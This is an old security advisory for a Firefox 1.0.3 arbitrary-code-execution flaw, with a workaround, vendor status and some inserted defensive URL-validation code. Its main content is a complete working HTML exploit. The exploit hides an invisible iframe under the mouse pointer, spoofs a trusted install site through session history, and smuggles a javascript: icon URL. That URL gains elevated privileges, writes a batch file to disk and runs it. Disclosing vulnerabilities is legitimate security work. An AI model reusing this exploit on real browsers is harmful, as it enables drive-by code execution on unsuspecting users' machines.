Mozilla Firefox Arbitrary Code Execution (Exploit)

Summary

Mozilla Firefox (originally known as Phoenix and briefly as Mozilla Firebird) is "a free, cross-platform, graphical web browser developed by the Mozilla Foundation and hundreds of volunteers".

Two vulnerabilities have been discovered in Firefox, which can be exploited by malicious people to run malicious code on vulnerable systems and compromise their integrity.

Credit:

The information has been provided by tuytumadre@att.net.
The original article can be found at: http://greyhatsecurity.org/vulntests/ffrc.htm


Details

Vulnerable Systems:
 * Mozilla Firefox version 1.0.3

This proof of concept involves exploiting two flaws:
1) Tricking Firefox into believing that a software installation is being triggered by a whitelisted site, by using a trusted URL stored in the session history.
2) The software installation trigger does not sufficiently check image URLs that contain JavaScript code.
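The second flaw is a missing scheme check on a URL that the browser later loads with elevated privileges. As an added example that is not part of the advisory or of Mozilla's code, the following parse-then-allowlist check shows the kind of validation that rejects the javascript: icon URL used here, including the usual scheme obfuscations; the function and constant names (isSafeIconUrl, ALLOWED_SCHEMES) and the sample inputs are constructed for this illustration.

```javascript
// Added example (not from the advisory): validate the icon URL handed to a
// software-install trigger by parsing it first and then allowlisting the scheme.
// Hypothetical names: ALLOWED_SCHEMES, isSafeIconUrl, classifySamples.
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

// Returns true only if `input`, resolved against `base`, parses to an http(s) URL.
// Parsing before comparing means the URL parser has already lowercased the
// scheme, dropped leading/trailing whitespace and removed embedded tabs and
// newlines, so "JaVaScRiPt:" or "java\tscript:" cannot slip past the allowlist.
function isSafeIconUrl(input, base) {
  if (typeof input !== 'string') return false;
  let url;
  try {
    url = new URL(input, base);
  } catch (e) {
    return false; // unparseable input: reject rather than guess
  }
  return ALLOWED_SCHEMES.has(url.protocol);
}

// Constructed sample inputs: one ordinary icon, one relative path, the shape of
// the javascript: URL from the advisory, and common obfuscations of the scheme.
const BASE = 'https://addons.update.mozilla.org/';
const SAMPLES = [
  'https://addons.update.mozilla.org/icons/flashgot.png', // ordinary icon URL
  '/icons/flashgot.png',                                  // relative, resolves to https
  "javascript:eval('netscape.security.PrivilegeManager...')", // exploit's icon argument
  '  JaVaScRiPt:alert(1)',                                // mixed case + leading spaces
  'java\tscript:alert(1)',                                // embedded tab, stripped by parser
  'data:text/html,<script>alert(1)</script>',             // another active scheme
  'ftp://example.invalid/icon.png',                       // not in the allowlist
];

// Pairs each sample with the verdict so the result can be inspected or asserted on.
function classifySamples() {
  return SAMPLES.map((s) => [s, isSafeIconUrl(s, BASE)]);
}

for (const [s, ok] of classifySamples()) {
  console.log(ok ? 'allow ' : 'reject', JSON.stringify(s));
}
```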

Workaround:
Disable software installation (Web Features panel of the Options/Preferences window in Firefox 1.0.3 or the Content panel in the latest trunk builds).

Vendor Status:
The Mozilla Foundation has partially patched this issue on the server side by adding random letters and numbers to the install function, which prevents this exploit from working. We anticipate that the Mozilla Foundation will release a Firefox 1.0.4 update shortly.

Exploit:
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'>
<html>
<head>
<title>Firefox Full Remote Compromise</title>
</head>
<body>
Click anywhere inside this page to compromise your system!<br>
Don't worry. Only a harmless batch file will be run. View the source if you don't believe me ;)<br>
Like I said in my Internet Explorer Auto-SP2 RC analysis, nothing is perfect. Breaking something, or if you're the hacker, building something, only requires patience and a little bit of spare time.<br> <br>
Greetz to Mikx, Michael Evanchik, and the entire Mozilla team. This is a very nice browser you guys have put together!

<iframe onload='loader()' src="javascript:'<noscript>'+eval('if (window.name!=\'stealcookies\')
{ window.name=\'stealcookies\'; } else { event=
{ target:{ href: \'http://ftp.mozilla.org/pub/mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'} };
install(event, \'You are vulnerable!!!\',\'javascript:eval(\\'netscape.security.PrivilegeManager.
enablePrivilege(\\\\'UniversalXPConnect\\\\'); file = Components.classes
[\\\\'@mozilla.org/file/local;1\\\\'].createInstance(Components.interfaces.nsILocalFile);
file.initWithPath(\\\\'c:\\\\\\\\booom.bat\\\\');
file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);
outputStream = Components.classes[\\\\'@mozilla.org/network/file-output-stream;1\\\\'].
createInstance( Components.interfaces.nsIFileOutputStream );
outputStream.init(file,0x04|0x08|0x20,420,0); output=\\\\'@ECHO off\\\\ncls\\\\n
ECHO If I wasnt so nice, this could have been a virus... \\\\nPAUSE\\\\';
outputStream.write(output,output.length); outputStream.close(); file.launch();\\')\'); }') + '</noscript><a href=\'https://addons.update.mozilla.org/extensions/moreinfo.php?id=220&
application=firefox\' style=\'cursor:default;\'>   </'+'a>"
id='targetframe' scrolling='no' frameborder='0' marginwidth='0' marginheight='0'
style='position:absolute; left:0px; width:0px;height:6px; width:6px; margin:0px;
padding:0px; -moz-opacity:0'></iframe>

<script language='JavaScript' type='text/javascript'>

// Keep the (invisible) iframe under the mouse pointer so any click lands on it.
document.onmousemove = function trackMouse(e) {
    document.getElementById('targetframe').style.left = (e.pageX-3)+'px'
    document.getElementById('targetframe').style.top = (e.pageY-3)+'px'
}

var counter = 0;
function loader() {
    counter++
    if(counter == 1) {
        stealcookies.focus()
    } else if(counter == 2) {
        stealcookies.history.go(-1)
        //targetframe.style.display='none';
    }
}
</script>
</body>
</html>

Bugzilla:
https://bugzilla.mozilla.org/show_bug.cgi?id=292691 (limited access)

Categories: Exploits